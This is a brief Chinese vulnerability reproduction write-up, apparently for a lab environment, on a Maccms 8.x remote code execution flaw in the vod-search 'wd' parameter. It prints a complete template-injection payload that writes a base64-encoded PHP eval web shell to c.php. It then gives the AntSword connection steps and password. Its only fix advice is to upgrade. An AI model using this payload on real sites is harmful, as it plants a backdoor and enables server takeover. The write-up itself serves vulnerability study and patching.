漏洞描述:
Maccms是一套跨平台的基于PHP和MySQL快速建站系统。
Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。
复现过程:
1.访问http://ip:port,出现如下页面,开始实验
2.通过火狐浏览器访问http://ip:port/index.php?m=vod-search
post提交payload:
wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}
3.蚁剑连接,getshell
url地址:http://ip:port/c.php
密码:c
借此漏洞,攻击者可以继承Web服务程序的权限去执行系统命令(任意代码)或读写文件;反弹shell;控制整个网站甚至控制服务器进一步内网渗透。
修复建议:
1.升级版本。